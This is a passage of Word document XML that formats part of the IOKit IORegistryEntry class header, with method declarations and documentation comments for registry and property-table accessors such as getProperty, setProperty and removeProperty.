        <w:t>runPropertyAction</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Action</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>actio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targe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1</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2</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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>arg3</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rivate</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>__LP64__</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3</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4</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5</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else</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3</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4</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5</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endif</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6</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7</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8</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9</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1</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2</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3</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4</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5</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6</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7</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8</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19</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1</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2</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3</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4</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5</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6</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7</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8</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29</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3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OSMetaClassDeclareReservedUnused</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>IORegistry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31</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ublic</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Registry accessors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RegistryRoot</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Returns a pointer to the root instance of the registry.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method provides an accessor to the root of the registry for the machine. The root may be passed to a registry iterator when iterating a plane, and contains properties that describe the available planes, and diagnostic information for IOKit. Keys for these properties are in IOKitKeys.h.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result A pointer to the IORegistryEntry root instance. It should not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RegistryRoo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GenerationCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Returns an generation count for all registry changing operations.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method provides an accessor to the current generation count (or seed) of the registry which changes when any topology change occurs in the registry - this does not include property table changes. It may be used to invalidate any caching of the results from IORegistryEntry methods.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result An integer generation coun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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SInt32</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getGenerationCou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lane</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Looks up the plane object by a C-string name.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion Planes are usually provided as globals by the creator, eg. gIOServicePlane, gIODeviceTreePlane, or gIOAudioPlane, however they may also be looked up by name with this method.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result A pointer to the plane object, or zero if no such plane exists. The returned pla</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ne should not be releas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lan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Registry Entry allocation &amp; ini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init</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Standard init method for all IORegistryEntry subclasses.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion A registry entry must be initialized with this method before it can be used. A property dictionary may passed and will be retained by this method for use as the registry entry's property table, or an empty one will be created.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param A dictionary that will become the registry entry's property table (retaining it), or zero which will cause an empty property table to be created.</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ini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free</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Standard free method for all IORegistryEntry subclasses.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method will release any resources of the entry, in particular its property table. Note that the registry entry must always be detached from the registry before free may be called, and subclasses (namely IOService) will have additional protocols for removing registry entries. free should never need be called directly.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fre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Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Replace a registry entry's property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method will release the current property table of a the entry and replace it with another, retaining the new property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param dict The new dictionary to be used as the entry's property tabl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setPropertyTabl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di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Synchronized property accessors; wrappers to OSDictionary</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>     * plus property creation helpers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add a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ies name as an OSSymbol.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param anObject The property value.</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nObjec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add a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tring.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param anObject The property value.</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nObjec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add a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anObject The property value.</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nObjec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construct and add a OSString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 The property is created as an OSString from the supplied C-string, set in the property table with the given name, and released.</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aString The property value as a C-string.</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String</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construct and add an OSBoolean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w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>egistryEntry accesses to the property table. The property is created as an OSBoolean from the supplied value, set in the property table with the given name, and released.</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aBoolean The property's boolean value.</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aBoolean</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construct and add an OSNumber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 The property is created as an OSNumber from the supplied value and size, set in the property table with the given name, and released.</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aValue The property's numeric value.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param aNumberOfBits The property's size in bits, for OSNumber.</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long</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long</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aValu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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aNumberOfBits</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y</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Synchronized method to construct and add an OSData property to a registry entry's property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method will add or replace a property in a registry entry's property table, using the OSDictionary::setObject semantics. This method is synchronized with other IORegistryEntry accesses to the property table. The property is created as an OSData copied from the supplied data and length, set in the property table with the given name, and released.</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bytes The property's value as a pointer. OSData will copy this data.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param length The property's size in bytes, for OSData.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result true on success or false on a resource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bytes</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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>length</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removeProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Synchronized method to remove a property from a registry entry's property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method will remove a property from a registry entry's property table, u</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sing the OSDictionary::remove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ymbol.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remove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removeProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Synchronized method to remove a property from a registry entry's property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method will remove a property from a registry entry's property table, using the OSDictionary::remove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tring.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remove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removeProperty</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Synchronized method to remove a property from a registry entry's property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method will remove a property from a registry entry's property table, using the OSDictionary::remove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 C-string.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remove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ng the OSDictionary::g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ymbol.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>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ng the OSDictionary::g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tring.</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ng the OSDictionary::getObject semantics. This method is synchronized with other IORegistryEntry accesses to the property table.</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n OSSymbol.</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w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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n OSString.</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w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Synchronized method to obtain a property from a registry entry or one of its parents (or children) in the hierarchy.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method will search for a property, starting first with this registry entry's property table, then iterating recusively through either the parent registry entries or the child registry entries of this entry. Once the first occurrence is found, it will lookup and return the value of the property, using the OSDictionary::getObject semantics. The iteration keeps track of entries that have been recursed into previously to avoid loops. This method is synchronized with other IORegistryEntry accesses to the property table(s).</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param plane The plane to iterate over, eg. gIOServicePlane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param options kIORegistryIterateRecursively may be set to recurse automatically into the registry hierarchy. Without this option, this method degenerates into the standard getProperty() call. kIORegistryIterateParents may be set to iterate the parents of the entry, in place of the children.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result The property value foun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OptionBits</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>            </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>option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Recursivel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kIORegistryIterate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w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ng the OSDictionary::getObject semantics, and return a reference to the caller.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ymbol.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result The property value found, or zero. It should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ng the OSDictionary::getObject semantics, and return a reference to the caller. This method is synchronized with other IORegistryEntry accesses to the property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param aKey The property's name as an OSString.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result The property value found, or zero. It should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Property</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Synchronized method to obtain a property from a registry entry's property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method will lookup a property in a registry entry's property table, using the OSDictionary::getObject semantics, and return a reference to the caller. This method is synchronized with other IORegistryEntry accesses to the property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param aKey The property's name as a C-string.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result The property value found, or zero. It should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Propert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aKe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ictionaryWithProperties</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Synchronized method to obtain copy a registry entry's property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method will copy a registry entry's property table, using the OSDictionary::withDictionary semantics. This method is synchronized with other IORegistryEntry accesses to the property table. Since OSDictionary will only copy property values by reference, synchronization is not guaranteed to any collection values.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result The created dictionary, or zero on a resource value. It should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dictionaryWithPropertie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rializeProperties</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Synchronized method to serialize a registry entry's property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method will serialize a registry entry's property table, using the OSDictionary::serialize semantics. This method is synchronized with other IORegistryEntry access</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
